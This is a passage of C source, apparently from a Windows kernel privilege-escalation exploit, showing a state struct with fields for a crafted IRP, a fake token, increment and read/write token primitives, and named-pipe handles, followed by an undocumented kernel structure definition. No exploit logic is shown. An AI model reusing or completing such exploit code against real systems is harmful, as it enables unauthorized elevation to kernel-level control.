|
void* input;
|
|
_IRP* crafted_irp;
|
|
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
|
|
void* p_mem_0x30;
|
|
void* p_mem_0xD0_2;
|
|
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
|
|
ACL* VariablePartDefaultDacl;
|
|
ACL* VariablePartDefaultDacl2;
|
|
_ERESOURCE* TokenLock;
|
|
void* PrimaryGroup;
|
|
int sizeOfClientTokenAndObjectHeader;
|
|
PSEP_SID_VALUES_BLOCK TokenSidValues;
|
|
_SECURITY_CLIENT_CONTEXT* security_client_context;
|
|
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
|
|
_TOKEN* fakeToken;
|
|
void *pipe_100_im_control_block;
|
|
void* pipe_100_rw_control_block;
|
|
void* p_mem_Pipe_hToPipe_1000_rw;
|
|
void* p_mem_Pipe_hToPipe_1000_rw_2;
|
|
HANDLE hPipeIM;
|
|
HANDLE hPipeRW;
|
|
HANDLE hFileIM;
|
|
HANDLE hFileRW;
|
|
HANDLE IncPrimitiveTOKEN;
|
|
HANDLE RWPrimitiveTOKEN;
|
|
};
|
|
|
|
//0x18 bytes (sizeof)
|
|
struct _DISPATCHER_HEADER
|
|
{
|
|
union
|
|
{
|
|
volatile LONG Lock; //0x0
|
|
LONG LockNV; //0x0
|
|
struct
|
|
{
|
|
UCHAR Type; //0x0
|
|
UCHAR Signalling; //0x1
|
|
UCHAR Size; //0x2
|
|
UCHAR Reserved1; //0x3
|
|
};
|
|
struct
|
|
{
|
|
UCHAR TimerType; //0x0
|
|
union
|
|
{
|
|
UCHAR TimerControlFlags; //0x1
|
|
struct
|
|
{
|
|
UCHAR Absolute : 1; |